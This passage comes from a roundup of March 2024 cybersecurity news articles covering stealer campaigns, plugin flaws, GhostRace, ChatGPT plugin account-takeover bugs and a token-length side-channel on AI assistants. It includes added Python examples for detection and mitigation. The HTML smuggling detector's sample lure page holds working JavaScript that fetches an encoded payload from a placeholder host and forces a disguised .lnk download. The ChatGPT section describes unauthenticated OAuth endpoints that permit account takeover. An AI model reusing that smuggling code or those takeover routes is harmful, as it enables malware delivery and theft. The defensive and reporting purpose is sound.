Once installed, it's capable of gathering credentials, cookies, and history from web browsers, screenshots, documents matching a list of specific extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted files created by AxCrypt, while KDBX refers to a password database created by the KeePass password manager.
The latest attack activity involves the threat actor creating counterfeit Google Docs pages on Google Sites that subsequently utilize HTML smuggling to deliver the payload.
HTML smuggling is the name given to a stealthy technique in which legitimate HTML5 and JavaScript features are abused to assemble and launch the malware by "smuggling" an encoded malicious script.
Thus, when a visitor is tricked into opening the rogue page from a phishing email, the browser decodes the script and extracts the payload on the host device, effectively bypassing typical security controls such as email gateways that are known to only inspect for suspicious attachments.
The AZORult campaign takes this approach a notch higher by adding a CAPTCHA barrier, an approach that not only gives a veneer of legitimacy but also serves as an additional layer of protection against URL scanners.
The downloaded file is a shortcut file (.LNK) that masquerades as a PDF bank statement; launching it kicks off a chain of intermediate batch and PowerShell scripts fetched from an already compromised domain.
One of the PowerShell scripts ("agent3.ps1") is designed to fetch the AZORult loader ("service.exe"), which, in turn, downloads and executes another PowerShell script ("sd2.ps1") containing the stealer malware.
"It executes the fileless AZORult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts," Michael Alcantara said. "It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender."
"Unlike common smuggling files where the blob is already inside the HTML code, this campaign copies an encoded payload from a separate compromised site. Using legitimate domains like Google Sites can help trick the victim into believing the link is legitimate."
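For defenders, the technique described above, including the variant that pulls the encoded payload from a separate site as JSON, can be spotted from the building blocks the page's scripts must combine. The scanner below is an added example written for this page (not Netskope's tooling or any code from the campaign); the sample pages and every host name in them are constructed placeholders.

```python
"""Heuristic detector for HTML smuggling pages (added example, not Netskope's tooling).

Inline <script> blocks are checked for the pieces HTML smuggling needs in the
browser: decoding an encoded payload, wrapping it in a Blob, and forcing a
download.  The external-JSON variant is flagged separately: a fetch() to a
host other than the page's own whose path ends in .json.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptExtractor(HTMLParser):
    """Collect inline script bodies and count <a download> anchors in markup."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.download_anchors = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")
        elif tag == "a" and any(name == "download" for name, _ in attrs):
            self.download_anchors += 1

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:            # script text may arrive in several chunks
            self.scripts[-1] += data


# Indicator name -> regex over the concatenated inline script text.
INDICATORS = {
    "decode_payload": re.compile(r"\batob\s*\(|String\.fromCharCode|Uint8Array\s*\("),
    "blob_construct": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "forced_download": re.compile(r"\.download\s*=|msSaveOrOpenBlob"),
    "programmatic_click": re.compile(r"\.click\s*\(\s*\)"),
}
FETCH_RE = re.compile(r"""fetch\s*\(\s*["']([^"']+)["']""")


def external_json_fetches(script, page_host):
    """Return fetched URLs on a different host whose path ends in .json."""
    hits = []
    for url in FETCH_RE.findall(script):
        parsed = urlparse(url)
        if parsed.netloc and parsed.netloc != page_host \
                and parsed.path.lower().endswith(".json"):
            hits.append(url)
    return hits


def scan_html(html, page_host):
    """Return matched indicators, remote payload URLs and a verdict for one page."""
    parser = _ScriptExtractor()
    parser.feed(html)
    script_text = "\n".join(parser.scripts)
    found = {name for name, rx in INDICATORS.items() if rx.search(script_text)}
    remote = external_json_fetches(script_text, page_host)
    if remote:
        found.add("external_json_payload")
    if parser.download_anchors:
        found.add("download_anchor")
    # A smuggling page needs a decode step, a Blob and a delivery mechanism;
    # a benign page that fetches JSON for its own UI does not combine all three.
    core_chain = {"decode_payload", "blob_construct"} <= found
    delivery = bool(found & {"forced_download", "object_url", "download_anchor"})
    return {"indicators": sorted(found), "remote_payloads": remote,
            "suspicious": core_chain and delivery}


# Constructed sample: a lure page whose script pulls the encoded payload from a
# separate site as JSON, decodes it and forces a download (placeholder hosts).
SMUGGLING_PAGE = """
<html><body><h1>Statement</h1>
<script>
fetch("https://payload-host.example/data/statement.json")
  .then(r => r.json())
  .then(j => {
    const bytes = Uint8Array.from(atob(j.d), c => c.charCodeAt(0));
    const blob = new Blob([bytes], {type: "application/octet-stream"});
    const a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = "statement.pdf.lnk";
    a.click();
  });
</script></body></html>
"""

# Constructed sample: an ordinary page that fetches JSON but never builds a Blob.
BENIGN_PAGE = """
<html><body><script>
fetch("/api/config.json").then(r => r.json()).then(c => console.log(c.theme));
</script></body></html>
"""

if __name__ == "__main__":
    for label, page in (("lure", SMUGGLING_PAGE), ("benign", BENIGN_PAGE)):
        print(label, scan_html(page, "sites.google.com"))
```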
The findings come as Cofense revealed the use of malicious SVG files by threat actors in recent campaigns to disseminate Agent Tesla and XWorm using an open-source program called AutoSmuggle that simplifies the process of crafting HTML or SVG smuggled files.
AutoSmuggle "takes a file such as an exe or an archive and 'smuggles' it into the SVG or HTML file so that when the SVG or HTML file is opened, the 'smuggled' file is delivered," the company explained.
Phishing campaigns have also been observed employing shortcut files packed within archive files to propagate LokiBot, an information stealer analogous to AZORult with features to harvest data from web browsers and cryptocurrency wallets.
"The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been observed using image steganography, multi-layered packing and living-off-the-land (LotL) techniques in past campaigns," SonicWall disclosed last week.
In another instance highlighted by Docguard, malicious shortcut files have been found to initiate a series of payload downloads and ultimately deploy AutoIt-based malware.
That's not all. Users in the Latin American region are being targeted as part of an ongoing campaign in which the attackers impersonate Colombian government agencies to send booby-trapped emails with PDF documents that accuse the recipients of flouting traffic rules.
Present within the PDF file is a link that, upon click, results in the download of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script responsible for fetching one of several remote access trojans, such as AsyncRAT, njRAT, and Remcos.
WordPress Admins Urged to Remove miniOrange Plugins Due to Critical Flaw
18.3.24
Vulnerability
The Hacker News
WordPress users of miniOrange's Malware Scanner and Web Application Firewall plugins are being urged to delete them from their websites following the discovery of a critical security flaw.
The flaw, tracked as CVE-2024-2172, is rated 9.8 out of a maximum of 10 on the CVSS scoring system and discovered by Stiofan. It impacts the following versions of the two plugins -
Malware Scanner (versions <= 4.7.2)
Web Application Firewall (versions <= 2.1.1)
It's worth noting that the plugins have been permanently closed by the maintainers as of March 7, 2024. While Malware Scanner has over 10,000 active installs, Web Application Firewall has more than 300 active installations.
"This vulnerability makes it possible for an unauthenticated attacker to grant themselves administrative privileges by updating the user password," Wordfence reported last week.
The issue is the result of a missing capability check in the function mo_wpns_init() that enables an unauthenticated attacker to arbitrarily update any user's password and escalate their privileges to that of an administrator, potentially leading to a complete compromise of the site.
"Once an attacker has gained administrative user access to a WordPress site they can then manipulate anything on the targeted site as a normal administrator would," Wordfence said.
"This includes the ability to upload plugin and theme files, which can be malicious zip files containing backdoors, and modify posts and pages which can be leveraged to redirect site users to other malicious sites or inject spam content."
The development comes as the WordPress security company warned of a similar high-severity privilege escalation flaw in the RegistrationMagic plugin (CVE-2024-1991, CVSS score: 8.8) affecting all versions, including and prior to 5.3.0.0.
The issue, addressed on March 11, 2024, with the release of version 5.3.1.0, permits an authenticated attacker to grant themselves administrative privileges by updating the user role. The plugin has more than 10,000 active installations.
"This vulnerability allows authenticated threat actors with subscriber-level permissions or higher to elevate their privileges to that of a site administrator which could ultimately lead to complete site compromise," István Márton said.
APT28 Hacker Group Targeting Europe, Americas, Asia in Widespread Phishing Scheme
18.3.24
APT
The Hacker News
The Russia-linked threat actor known as APT28 has been linked to multiple ongoing phishing campaigns that employ lure documents imitating government and non-governmental organizations (NGOs) in Europe, the South Caucasus, Central Asia, and North and South America.
"The uncovered lures include a mixture of internal and publicly available documents, as well as possible actor-generated documents associated with finance, critical infrastructure, executive engagements, cyber security, maritime security, healthcare, business, and defense industrial production," IBM X-Force said in a report published last week.
The tech company is tracking the activity under the moniker ITG05, which is also known as Blue Athena, BlueDelta, Fancy Bear, Fighting Ursa, Forest Blizzard (formerly Strontium), FROZENLAKE, Iron Twilight, Pawn Storm, Sednit, Sofacy, TA422, and UAC-028.
The disclosure comes more than three months after the adversary was spotted using decoys related to the ongoing Israel-Hamas war to deliver a custom backdoor dubbed HeadLace.
APT28 has since also targeted Ukrainian government entities and Polish organizations with phishing messages designed to deploy bespoke implants and information stealers like MASEPIE, OCEANMAP, and STEELHOOK.
Other campaigns have entailed the exploitation of security flaws in Microsoft Outlook (CVE-2023-23397, CVSS score: 9.8) to plunder NT LAN Manager (NTLM) v2 hashes, raising the possibility that the threat actor may leverage other weaknesses to exfiltrate NTLMv2 hashes for use in relay attacks.
The latest campaigns observed by IBM X-Force between late November 2023 and February 2024 leverage the "search-ms:" URI protocol handler in Microsoft Windows to trick victims into downloading malware hosted on actor-controlled WebDAV servers.
There is evidence to suggest that both the WebDAV servers and the MASEPIE C2 servers may be hosted on compromised Ubiquiti routers; a botnet made up of such routers was taken down by the U.S. government last month.
The phishing attacks impersonate entities from several countries such as Argentina, Ukraine, Georgia, Belarus, Kazakhstan, Poland, Armenia, Azerbaijan, and the U.S., putting to use a mix of authentic publicly available government and non-government lure documents to activate the infection chains.
"In an update to their methodologies, ITG05 is utilizing the freely available hosting provider, firstcloudit[.]com to stage payloads to enable ongoing operations," security researchers Joe Fasulo, Claire Zaboeva, and Golo Mühr said.
APT28's elaborate scheme culminates in the execution of MASEPIE, OCEANMAP, and STEELHOOK, which are designed to exfiltrate files, run arbitrary commands, and steal browser data. OCEANMAP has been characterized as a more capable version of CredoMap, another backdoor previously identified as being used by the group.
"ITG05 remains adaptable to changes in opportunity by delivering new infection methodologies and leveraging commercially available infrastructure, while consistently evolving malware capabilities," the researchers concluded.
Hackers Using Cracked Software on GitHub to Spread RisePro Info Stealer
17.3.24
Virus
The Hacker News
Cybersecurity researchers have found a number of GitHub repositories offering cracked software that are used to deliver an information stealer called RisePro.
The campaign, codenamed gitgub, includes 17 repositories associated with 11 different accounts, according to G DATA. The repositories in question have since been taken down by the Microsoft-owned subsidiary.
"The repositories look similar, featuring a README.md file with the promise of free cracked software," the German cybersecurity company said.
"Green and red circles are commonly used on Github to display the status of automatic builds. Gitgub threat actors added four green Unicode circles to their README.md that pretend to display a status alongside a current date and provide a sense of legitimacy and recency."
The list of repositories is as follows, with each of them pointing to a download link ("digitalxnetwork[.]com") containing a RAR archive file -
andreastanaj/AVAST
andreastanaj/Sound-Booster
aymenkort1990/fabfilter
BenWebsite/-IObit-Smart-Defrag-Crack
Faharnaqvi/VueScan-Crack
javisolis123/Voicemod
lolusuary/AOMEI-Backupper
lolusuary/Daemon-Tools
lolusuary/EaseUS-Partition-Master
lolusuary/SOOTHE-2
mostofakamaljoy/ccleaner
rik0v/ManyCam
Roccinhu/Tenorshare-Reiboot
Roccinhu/Tenorshare-iCareFone
True-Oblivion/AOMEI-Partition-Assistant
vaibhavshiledar/droidkit
vaibhavshiledar/TOON-BOOM-HARMONY
The RAR archive, which requires the victims to supply a password mentioned in the repository's README.md file, contains an installer file, which unpacks the next-stage payload, an executable file that's inflated to 699 MB in an effort to crash analysis tools like IDA Pro.
The actual contents of the file – amounting to a mere 3.43 MB – act as a loader to inject RisePro (version 1.6) into either AppLaunch.exe or RegAsm.exe.
RisePro burst into the spotlight in late 2022 when it was distributed using a pay-per-install (PPI) malware downloader service known as PrivateLoader.
Written in C++, it's designed to gather sensitive information from infected hosts and exfiltrate it to two Telegram channels, which are often used by threat actors to extract victims' data. Interestingly, recent research from Checkmarx showed that it's possible to infiltrate and forward messages from an attacker's bot to another Telegram account.
The development comes as Splunk detailed the tactics and techniques adopted by Snake Keylogger, describing it as a stealer malware that "employs a multifaceted approach to data exfiltration."
"The use of FTP facilitates the secure transfer of files, while SMTP enables the sending of emails containing sensitive information," Splunk said. "Additionally, integration with Telegram offers a real-time communication platform, allowing for immediate transmission of stolen data."
Stealer malware has become increasingly popular, often serving as the primary vector for ransomware and other high-impact data breaches. According to a report from Specops published this week, RedLine, Vidar, and Raccoon have emerged as the most widely used stealers, with RedLine alone accounting for the theft of more than 170.3 million passwords in the last six months.
"The current rise of information-stealing malware is a stark reminder of constantly evolving digital threats," Flashpoint noted in January 2024. "While the motivations behind its use is almost always rooted in financial gain, stealers are continually adapting while being more accessible and easier to use."
GhostRace – New Data Leak Vulnerability Affects Modern CPUs
16.3.24
Vulnerability
The Hacker News
A group of researchers has discovered a new data leakage attack impacting modern CPU architectures supporting speculative execution.
Dubbed GhostRace (CVE-2024-2193), it is a variation of the transient execution CPU vulnerability known as Spectre v1 (CVE-2017-5753). The approach combines speculative execution and race conditions.
"All the common synchronization primitives implemented using conditional branches can be microarchitecturally bypassed on speculative paths using a branch misprediction attack, turning all architecturally race-free critical regions into Speculative Race Conditions (SRCs), allowing attackers to leak information from the target," the researchers said.
The findings come from the Systems Security Research Group at IBM Research Europe and VUSec, the latter of which disclosed another side-channel attack called SLAM targeting modern processors in December 2023.
Spectre refers to a class of side-channel attacks that exploit branch prediction and speculative execution on modern CPUs to read privileged data in the memory, bypassing isolation protections between applications.
While speculative execution is a performance optimization technique used by most CPUs, Spectre attacks take advantage of the fact that erroneous predictions leave behind traces of memory accesses or computations in the processor's caches.
"Spectre attacks induce a victim to speculatively perform operations that would not occur during strictly serialized in-order processing of the program's instructions, and which leak victim's confidential information via a covert channel to the adversary," the researchers behind the Spectre attack noted in January 2018.
What makes GhostRace notable is that it enables an unauthenticated attacker to extract arbitrary data from the processor using race conditions to access the speculative executable code paths by leveraging what's called a Speculative Concurrent Use-After-Free (SCUAF) attack.
A race condition is an undesirable situation that occurs when two or more processes attempt to access the same, shared resource without proper synchronization, thereby leading to inconsistent results and opening a window of opportunity for an attacker to perform malicious actions.
"In characteristics and exploitation strategy, an SRC vulnerability is similar to a classic race condition," the CERT Coordination Center (CERT/CC) explained in an advisory.
"However, it is different in that the attacker exploits said race condition on a transiently executed path originating from a mis-speculated branch (similar to Spectre v1), targeting a racy code snippet or gadget that ultimately discloses information to the attacker."
The net result is that it permits an attacker with access to CPU resources to access arbitrary sensitive data from host memory.
"Any software, e.g., operating system, hypervisor, etc., implementing synchronization primitives through conditional branches without any serializing instruction on that path and running on any microarchitecture (e.g., x86, ARM, RISC-V, etc.), which allows conditional branches to be speculatively executed, is vulnerable to SRCs," VUSec said.
Following responsible disclosure, AMD said its existing guidance for Spectre "remains applicable to mitigate this vulnerability." The maintainers of the Xen open-source hypervisor acknowledged that all versions are impacted, although they said it's unlikely to pose a serious security threat.
"Out of caution, the Xen Security Team have provided hardening patches including the addition of a new LOCK_HARDEN mechanism on x86 similar to the existing BRANCH_HARDEN," Xen said.
"LOCK_HARDEN is off by default, owing to the uncertainty of there being a vulnerability under Xen, and uncertainty over the performance impact. However, we expect more research to happen in this area, and feel it is prudent to have a mitigation in place."
Third-Party ChatGPT Plugins Could Lead to Account Takeovers
15.3.24
AI
The Hacker News
Cybersecurity researchers have found that third-party plugins available for OpenAI ChatGPT could act as a new attack surface for threat actors looking to gain unauthorized access to sensitive data.
According to new research published by Salt Labs, security flaws found directly in ChatGPT and within the ecosystem could allow attackers to install malicious plugins without users' consent and hijack accounts on third-party websites like GitHub.
ChatGPT plugins, as the name implies, are tools designed to run on top of the large language model (LLM) with the aim of accessing up-to-date information, running computations, or accessing third-party services.
OpenAI has since also introduced GPTs, which are bespoke versions of ChatGPT tailored for specific use cases, while reducing third-party service dependencies. As of March 19, 2024, ChatGPT users will no longer be able to install new plugins or create new conversations with existing plugins.
One of the flaws unearthed by Salt Labs involves exploiting the OAuth workflow to trick a user into installing an arbitrary plugin by taking advantage of the fact that ChatGPT doesn't validate that the user indeed started the plugin installation.
This effectively could allow threat actors to intercept and exfiltrate all data shared by the victim, which may contain proprietary information.
The cybersecurity firm also unearthed issues with PluginLab that could be weaponized by threat actors to conduct zero-click account takeover attacks, allowing them to gain control of an organization's account on third-party websites like GitHub and access their source code repositories.
"'auth.pluginlab[.]ai/oauth/authorized' does not authenticate the request, which means that the attacker can insert another memberId (aka the victim) and get a code that represents the victim," security researcher Aviad Carmel explained. "With that code, he can use ChatGPT and access the GitHub of the victim."
The memberId of the victim can be obtained by querying the endpoint "auth.pluginlab[.]ai/members/requestMagicEmailCode." There is no evidence that any user data has been compromised using the flaw.
Also discovered in several plugins, including Kesem AI, is an OAuth redirection manipulation bug that could permit an attacker to steal the account credentials associated with the plugin itself by sending a specially crafted link to the victim.
The development comes weeks after Imperva detailed two cross-site scripting (XSS) vulnerabilities in ChatGPT that could be chained to seize control of any account.
In December 2023, security researcher Johann Rehberger demonstrated how malicious actors could create custom GPTs that can phish for user credentials and transmit the stolen data to an external server.
New Remote Keylogging Attack on AI Assistants
"LLMs generate and send responses as a series of tokens (akin to words), with each token transmitted from the server to the user as it is generated," a group of academics from the Ben-Gurion University and Offensive AI Research Lab said.
"While this process is encrypted, the sequential token transmission exposes a new side-channel: the token-length side-channel. Despite encryption, the size of the packets can reveal the length of the tokens, potentially allowing attackers on the network to infer sensitive and confidential information shared in private AI assistant conversations."
This is accomplished by means of a token inference attack that's designed to decipher responses in encrypted traffic by training an LLM model capable of translating token-length sequences into their natural language sentential counterparts (i.e., plaintext).
In other words, the core idea is to intercept the real-time chat responses with an LLM provider, use the network packet headers to infer the length of each token, extract and parse text segments, and leverage the custom LLM to infer the response.
To counteract the effectiveness of the side-channel attack, it's recommended that companies that develop AI assistants apply random padding to obscure the actual length of tokens, transmit tokens in larger groups rather than individually, and send complete responses at once, instead of in a token-by-token fashion.
"Balancing security with usability and performance presents a complex challenge that requires careful consideration," the researchers concluded.
The findings also follow new research published this week about an LLM side-channel attack that employs token-length as a covert means to extract encrypted responses from AI Assistants over the web.
Two key prerequisites to pulling off the attack are an AI chat client running in streaming mode and an adversary who is capable of capturing network traffic between the client and the AI chatbot.
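The side channel and the three recommended mitigations, modelled in Python as an added example (not the researchers' code): the framing overhead, padding range and sample response are constructed values, and the model only shows how many per-token lengths an on-path observer can read off the message sizes under each strategy.

```python
"""Added example (not the researchers' code): a model of the token-length
side-channel described above and of the three mitigations recommended.
Framing overhead, padding range and the sample response are constructed; real
TLS record sizes differ, but the relationship the attack relies on (observed
size minus fixed overhead equals token length) is the one modelled here."""
import random

FRAMING_OVERHEAD = 29  # constructed: fixed bytes added to every streamed message
PAD_MAX = 16           # constructed: upper bound of random padding per message


def message_sizes(tokens, *, pad_rng=None, group=1, whole=False):
    """Sizes of the messages an on-path observer sees for one streamed response.

    tokens  -- the response as the server emits it, one string per token
    pad_rng -- random.Random supplying padding lengths; None means no padding
    group   -- tokens per message (1 reproduces token-by-token streaming)
    whole   -- send the complete response as a single message
    """
    if whole:
        chunks = ["".join(tokens)]
    else:
        chunks = ["".join(tokens[i:i + group])
                  for i in range(0, len(tokens), group)]
    sizes = []
    for chunk in chunks:
        size = FRAMING_OVERHEAD + len(chunk.encode())
        if pad_rng is not None:
            size += pad_rng.randint(1, PAD_MAX)  # at least one byte of padding
        sizes.append(size)
    return sizes


def inferred_lengths(sizes):
    """What an observer recovers by subtracting the fixed, known overhead."""
    return [s - FRAMING_OVERHEAD for s in sizes]


def exact_matches(tokens, inferred):
    """Positions where the observer's length equals the true token length."""
    true = [len(t.encode()) for t in tokens]
    return sum(1 for a, b in zip(true, inferred) if a == b)


def compare_strategies(tokens, seed=1):
    """Returns {strategy: (messages on the wire, token lengths recovered exactly)}."""
    # Seeded for a reproducible demo; production padding must use a CSPRNG.
    rng = random.Random(seed)
    strategies = {
        "token_by_token": message_sizes(tokens),
        "random_padding": message_sizes(tokens, pad_rng=rng),
        "grouped_by_4": message_sizes(tokens, group=4),
        "whole_response": message_sizes(tokens, whole=True),
    }
    return {name: (len(sizes), exact_matches(tokens, inferred_lengths(sizes)))
            for name, sizes in strategies.items()}


# Constructed sample response, split into tokens as a server would stream them.
SAMPLE_TOKENS = ["The", " meeting", " is", " on", " Thursday", " at", " 3", " pm", "."]

if __name__ == "__main__":
    for name, (n_msgs, leaked) in compare_strategies(SAMPLE_TOKENS).items():
        print(f"{name:15s} messages={n_msgs:2d} token lengths recovered={leaked}")
```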
Google Introduces Enhanced Real-Time URL Protection for Chrome Users
15.3.24
Security
The Hacker News
Google on Thursday announced an enhanced version of Safe Browsing to provide real-time, privacy-preserving URL protection and safeguard users from visiting potentially malicious sites.
"The Standard protection mode for Chrome on desktop and iOS will check sites against Google's server-side list of known bad sites in real-time," Google's Jonathan Li and Jasika Bawa said.
"If we suspect a site poses a risk to you or your device, you'll see a warning with more information. By checking sites in real time, we expect to block 25% more phishing attempts."
Up until now, the Chrome browser used a locally stored list of known unsafe sites that was updated every 30 to 60 minutes, and a hash-based approach to compare every site visited against that database.
Google first revealed its plans to switch to real-time server-side checks without sharing users' browsing history with the company in September 2023.
The reason for the change, the search giant said, is motivated by the fact that the list of harmful websites is growing at a rapid pace and that 60% of the phishing domains exist for less than 10 minutes, making them difficult to block.
"Not all devices have the resources necessary to maintain this growing list, nor are they always able to receive and apply updates to the list at the frequency necessary to benefit from full protection," it added.
Thus, with the new architecture, every time a user attempts to visit a website, the URL is checked against the browser's global and local caches containing known safe URLs and the results of previous Safe Browsing checks in order to determine the site's status.
Should the visited URL be absent from the caches, a real-time check is performed by obfuscating the URL into 32-byte full hashes, which are then truncated into 4-byte long hash prefixes, encrypted, and sent to a privacy server.
"The privacy server removes potential user identifiers and forwards the encrypted hash prefixes to the Safe Browsing server via a TLS connection that mixes requests with many other Chrome users," Google explained.
The Safe Browsing server subsequently decrypts the hash prefixes and matches them against the server-side database to return full hashes of all unsafe URLs that match one of the hash prefixes sent by the browser.
Finally, on the client side, the full hashes are compared against the full hashes of the visited URL, and a warning message is displayed if a match is found.
Google also confirmed that the privacy server is nothing but an Oblivious HTTP (OHTTP) relay operated by Fastly that sits between Chrome and the Safe Browsing server to prevent the latter from accessing users' IP addresses, thereby preventing it from correlating the URL checks with a user's internet browsing history.
"Ultimately, Safe Browsing sees the hash prefixes of your URL but not your IP address, and the privacy server sees your IP address but not the hash prefixes," the company emphasized. "No single party has access to both your identity and the hash prefixes. As such, your browsing activity remains private."
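The lookup flow described above, simulated in Python as an added example (not Google's or Chrome's code): URL canonicalization is simplified and the encryption between browser and server is only modelled, so what the example shows is the prefix/full-hash exchange, which party sees which data, and the client-side caches.

```python
"""Added example (not Google's or Chrome's code): a simulation of the real-time
Safe Browsing lookup described above.  URL canonicalization and the encryption
between Chrome and the Safe Browsing server are modelled, not implemented; the
hash-prefix / full-hash exchange, the relay's limited view and the client-side
caches are what the example demonstrates."""
import hashlib
from dataclasses import dataclass, field
from urllib.parse import urlsplit

PREFIX_LEN = 4  # bytes; 4-byte prefixes of 32-byte SHA-256 hashes, as described


def canonical_url(url: str) -> str:
    # Simplified canonicalization (assumption): lower-case host, drop scheme and
    # fragment.  Real Safe Browsing hashes several host-suffix/path-prefix
    # expressions per URL after a more thorough canonicalization.
    parts = urlsplit(url)
    query = f"?{parts.query}" if parts.query else ""
    return f"{parts.netloc.lower()}{parts.path or '/'}{query}"


def full_hash(url: str) -> bytes:
    return hashlib.sha256(canonical_url(url).encode()).digest()  # 32 bytes


def hash_prefix(h: bytes) -> bytes:
    return h[:PREFIX_LEN]


@dataclass
class SealedRequest:
    # Models the encrypted hash-prefix request; only the server "opens" it.
    prefixes: list


@dataclass
class SafeBrowsingServer:
    """Holds the server-side list as full hashes; sees prefixes, not URLs or IPs."""
    unsafe_hashes: set
    prefixes_seen: list = field(default_factory=list)

    def lookup(self, sealed: SealedRequest) -> list:
        self.prefixes_seen.append(list(sealed.prefixes))
        wanted = set(sealed.prefixes)
        # Return the full hash of every unsafe URL sharing one of the prefixes.
        return [h for h in self.unsafe_hashes if hash_prefix(h) in wanted]


@dataclass
class PrivacyRelay:
    """Stand-in for the OHTTP relay: learns who is asking, forwards the sealed
    request unopened, and never sees the prefixes inside it."""
    server: SafeBrowsingServer
    client_ips_seen: list = field(default_factory=list)

    def forward(self, client_ip: str, sealed: SealedRequest) -> list:
        self.client_ips_seen.append(client_ip)
        return self.server.lookup(sealed)


@dataclass
class Client:
    relay: PrivacyRelay
    ip: str
    known_safe: set = field(default_factory=set)    # full hashes judged safe
    known_unsafe: set = field(default_factory=set)  # full hashes judged unsafe

    def check(self, url: str) -> str:
        h = full_hash(url)
        # 1. Caches first: a previous verdict costs no network request.
        if h in self.known_unsafe:
            return "unsafe"
        if h in self.known_safe:
            return "safe"
        # 2. Otherwise send only the 4-byte prefix, via the relay.
        matches = self.relay.forward(self.ip, SealedRequest([hash_prefix(h)]))
        # 3. The decisive comparison is local, against the full 32-byte hash,
        #    so a prefix collision with an unsafe URL does not produce a warning.
        verdict = "unsafe" if h in matches else "safe"
        (self.known_unsafe if verdict == "unsafe" else self.known_safe).add(h)
        return verdict


def demo() -> dict:
    # Constructed sample data: one blocklisted URL, one benign URL.
    server = SafeBrowsingServer({full_hash("http://evil.example/login")})
    relay = PrivacyRelay(server)
    client = Client(relay, ip="203.0.113.7")
    verdicts = [client.check("http://EVIL.example/login"),
                client.check("http://good.example/"),
                client.check("http://evil.example/login")]  # served from cache
    return {"verdicts": verdicts,
            "requests_reaching_server": len(server.prefixes_seen),
            "relay_saw_ips": relay.client_ips_seen}


if __name__ == "__main__":
    print(demo())
```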
Malicious Ads Targeting Chinese Users with Fake Notepad++ and VNote Installers
15.3.24
Virus
The Hacker News
Chinese users looking for legitimate software such as Notepad++ and VNote on search engines like Baidu are being targeted with malicious ads and bogus links to distribute trojanized versions of the software and ultimately deploy Geacon, a Golang-based implementation of Cobalt Strike.
"The malicious site found in the notepad++ search is distributed through an advertisement block," Kaspersky researcher Sergey Puzan said.
"Opening it, an attentive user will immediately notice an amusing inconsistency: the website address contains the line vnote, the title offers a download of Notepad‐‐ (an analog of Notepad++, also distributed as open-source software), while the image proudly shows Notepad++. In fact, the packages downloaded from here contain Notepad‐‐."
The website, named vnote.fuwenkeji[.]cn, contains download links to Windows, Linux, and macOS versions of the software, with the link to the Windows variant pointing to the official Gitee repository containing the Notepad-- installer ("Notepad--v2.10.0-plugin-Installer.exe").
The Linux and macOS versions, on the other hand, lead to malicious installation packages hosted on vnote-1321786806.cos.ap-hongkong.myqcloud[.]com.
In a similar fashion, the fake look-alike websites for VNote ("vnote[.]info" and "vnotepad[.]com") lead to the same set of myqcloud[.]com links, in this case also pointing to a Windows installer hosted on the domain. That said, the links to the potentially malicious versions of VNote are no longer active.
An analysis of the modified Notepad-- installers reveals that they are designed to retrieve a next-stage payload from a remote server, a backdoor that exhibits similarities with Geacon.
It's capable of creating SSH connections, performing file operations, enumerating processes, accessing clipboard content, executing files, uploading and downloading files, taking screenshots, and even entering into sleep mode. Command-and-control (C2) is facilitated by means of the HTTPS protocol.
The development comes as malvertising campaigns have also acted as a conduit for other malware such as FakeBat (aka EugenLoader) malware with the help of MSIX installer files masquerading as Microsoft OneNote, Notion, and Trello.
LockBit Ransomware Hacker Ordered to Pay $860,000 After Guilty Plea in Canada
14.3.24
Cyber
The Hacker News
A 34-year-old Russian-Canadian national has been sentenced to nearly four years in jail in Canada for his participation in the LockBit global ransomware operation.
Mikhail Vasiliev, an Ontario resident, was originally arrested in November 2022 and charged by the U.S. Department of Justice (DoJ) with "conspiring with others to intentionally damage protected computers and to transmit ransom demands in connection with doing so."
News of Vasiliev's jail term was first reported by CTV News.
The defendant, who had his home searched by Canadian law enforcement authorities in August and October 2022, is said to have kept a list of "prospective or historical" victims and screenshots of communications exchanged with "LockBitSupp" on the Tox messaging platform.
The raid also uncovered a text file with instructions to deploy LockBit ransomware, the ransomware source code, and a control panel used by the e-crime group to deliver the file-locking malware.
Vasiliev, according to CTV News, pleaded guilty to eight counts of cyber extortion, mischief, and weapons charges last month. During the sentencing, he was characterized by Justice Michelle Fuerst as a "cyber terrorist" who was "motivated by his own greed."
He is believed to have become a cyber criminal while at home during the COVID-19 pandemic, attempting to seek ransom payments from three Canadian companies between 2021 and 2022 by stealing their data and holding it hostage.
Vasiliev, who has consented to being extradited to the U.S., has also been ordered to pay back more than $860,000 in restitution.
One of the most prolific ransomware groups in history, LockBit suffered a huge blow in February 2024, when its infrastructure was seized in a coordinated law enforcement operation. The disruption was accompanied by arrests of three LockBit affiliates in Poland and Ukraine.
Although the group reemerged with a new data leak site, there is evidence to suggest that the new victims being listed are either old or fake, designed to give an impression that the group is back up and running.
The development arrives as a federal jury in Washington, D.C., convicted Roman Sterlingov, a dual Russian-Swedish national, for his operation of Bitcoin Fog from 2011 through 2021, facilitating the laundering of profits made from the sale of illegal narcotics, computer crimes, stolen identities, and child sexual abuse material.
Ilya Lichtenstein, who pleaded guilty in August 2023 to the theft of about 120,000 bitcoin in connection to the hack of the Bitfinex cryptocurrency exchange, testified last month how he had used Bitcoin Fog 10 times to launder the virtual assets, Bloomberg reported.
"Bitcoin Fog was the longest-running cryptocurrency 'mixer,' gaining notoriety as a go-to money laundering service for criminals seeking to hide their illicit proceeds from law enforcement," the DoJ said.
"Over the course of its decade-long operation, Bitcoin Fog moved over 1.2 million bitcoin, which was valued at approximately $400 million at the time of the transactions."
Researchers Detail Kubernetes Vulnerability That Enables Windows Node Takeover
14.3.24
Vulnerability
The Hacker News
Details have been made public about a now-patched high-severity flaw in Kubernetes that could allow a malicious attacker to achieve remote code execution with elevated privileges under specific circumstances.
"The vulnerability allows remote code execution with SYSTEM privileges on all Windows endpoints within a Kubernetes cluster," Akamai security researcher Tomer Peled said. "To exploit this vulnerability, the attacker needs to apply malicious YAML files on the cluster."
